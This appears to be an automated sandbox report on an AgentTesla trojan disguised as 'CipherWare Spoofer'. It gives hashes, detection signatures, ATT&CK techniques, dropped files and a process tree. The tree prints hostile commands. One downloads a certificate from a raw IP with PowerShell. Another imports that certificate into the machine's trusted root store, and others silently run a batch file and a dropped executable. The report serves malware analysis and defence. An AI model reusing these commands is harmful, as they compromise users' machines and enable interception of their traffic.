agenttesla | 9f0930c6ccac8f9a6a58b056ce2cfa25da6a4c61ce6bdb31d80b963e911e0adf

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-06-2024 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CipherWare Spoofer 04-29/Spoofer.exe
Size

5.9MB
MD5

482183f599a399384629aa7deb145b2e
SHA1

252c735e209efea8f92dafe4c50aea95f60915f2
SHA256

c941f6995ef56ab0fa76f5c604c134e86b5df21b45284e78669f3074be2473e7
SHA512

72eb143ae229041b9d3cd219df7cc54138c9f99f81409a825cdc9741b0483cf4dabfe7b9f410d843263cf665ebc171fbc6168c83ecbb14d123d4a3fe8d565c25
SSDEEP

98304:RXbIrqdcbu8gacqECpO0zSU8B2lJtc/jXwYUObL4Eyv3ZjmzTm7Sw:VIJbu8jzXyuY0YTf/+jmz5

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral30/memory/4624-34-0x0000000008700000-0x0000000008914000-memory.dmp	family_agenttesla

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1820	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4576	powershell.exe
1820	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4624	UBFAFGEWG.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	UBFAFGEWG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	UBFAFGEWG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	UBFAFGEWG.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1820	powershell.exe
1820	powershell.exe
4576	powershell.exe
4576	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	4624	UBFAFGEWG.exe
Token: SeDebugPrivilege	4576	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe
932	Spoofer.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 932 wrote to memory of 1188	932	Spoofer.exe	83
PID 932 wrote to memory of 1188	932	Spoofer.exe	83
PID 1188 wrote to memory of 428	1188	cmd.exe	85
PID 1188 wrote to memory of 428	1188	cmd.exe	85
PID 428 wrote to memory of 5000	428	cmd.exe	87
PID 428 wrote to memory of 5000	428	cmd.exe	87
PID 428 wrote to memory of 3540	428	cmd.exe	88
PID 428 wrote to memory of 3540	428	cmd.exe	88
PID 428 wrote to memory of 1820	428	cmd.exe	89
PID 428 wrote to memory of 1820	428	cmd.exe	89
PID 932 wrote to memory of 4624	932	Spoofer.exe	90
PID 932 wrote to memory of 4624	932	Spoofer.exe	90
PID 932 wrote to memory of 4624	932	Spoofer.exe	90
PID 428 wrote to memory of 4576	428	cmd.exe	91
PID 428 wrote to memory of 4576	428	cmd.exe	91
PID 428 wrote to memory of 1724	428	cmd.exe	92
PID 428 wrote to memory of 1724	428	cmd.exe	92
PID 1724 wrote to memory of 3876	1724	cmd.exe	93
PID 1724 wrote to memory of 3876	1724	cmd.exe	93
PID 1724 wrote to memory of 4720	1724	cmd.exe	94
PID 1724 wrote to memory of 4720	1724	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\system32\certutil.exe
      certutil -store TrustedRoot
      4⤵
      PID:5000
  - - C:\Windows\system32\findstr.exe
      findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:3540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Windows\system32\certutil.exe
        
        certutil -store TrustedRoot
        5⤵
        
        PID:3876
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
        5⤵
        
        PID:4720
- C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe
  C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe
  2⤵
  - Executes dropped EXE
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:4624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3dmu0qan.sig.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut471B.tmp

Filesize
4.8MB

MD5
78f93936aa75709bc214e122c58f019a

SHA1
2a83b20c0fbf526cc86af4b80cbca319a21dae6d

SHA256
031c83154c6efbaac14659994730e227138612c2bf740ab44fdc597868e45a61

SHA512
2efb74f82ae46382bfbe9ff93f6092a2b665b5868280f218d3eeef43e6368545b66d55ba81db3ac9323a2ea5df9b960c1166b378d6503ee0a39d3689fed65d90

Download Submit
C:\Users\Admin\AppData\Local\Temp\checklmao.bat

Filesize
1KB

MD5
172008fe1545829cce82cfd1feb4ada1

SHA1
a1eed63e579043f79f9799ad6f46131f4412a35c

SHA256
6540e83a53bb1882c60487c3f31a898ead614e59d725715ec96ad1c05219d524

SHA512
7bd38c65ab4100adac4d6efc2afa72db09ee6bb705c27372ce5f53b62920ab7aef3f0840f5ef5747eb9ed55bad9e4952929062cdd1a8f9da89ad3ce42f0e0cc6

Download Submit
memory/1820-18-0x000001AE7D970000-0x000001AE7D992000-memory.dmp

Filesize
136KB

Download
memory/1820-39-0x000001AE7D5E0000-0x000001AE7D7FC000-memory.dmp

Filesize
2.1MB

Download
memory/1820-35-0x000001AE7D5E0000-0x000001AE7D7FC000-memory.dmp

Filesize
2.1MB

Download
memory/4624-30-0x0000000005260000-0x000000000526A000-memory.dmp

Filesize
40KB

Download
memory/4624-31-0x0000000006E70000-0x0000000007350000-memory.dmp

Filesize
4.9MB

Download
memory/4624-32-0x0000000007350000-0x000000000749E000-memory.dmp

Filesize
1.3MB

Download
memory/4624-33-0x0000000002A60000-0x0000000002A74000-memory.dmp

Filesize
80KB

Download
memory/4624-34-0x0000000008700000-0x0000000008914000-memory.dmp

Filesize
2.1MB

Download
memory/4624-29-0x0000000005200000-0x0000000005212000-memory.dmp

Filesize
72KB

Download
memory/4624-28-0x0000000005310000-0x00000000053A2000-memory.dmp

Filesize
584KB

Download
memory/4624-27-0x00000000058C0000-0x0000000005E64000-memory.dmp

Filesize
5.6MB

Download
memory/4624-26-0x00000000002F0000-0x00000000007BE000-memory.dmp

Filesize
4.8MB

Download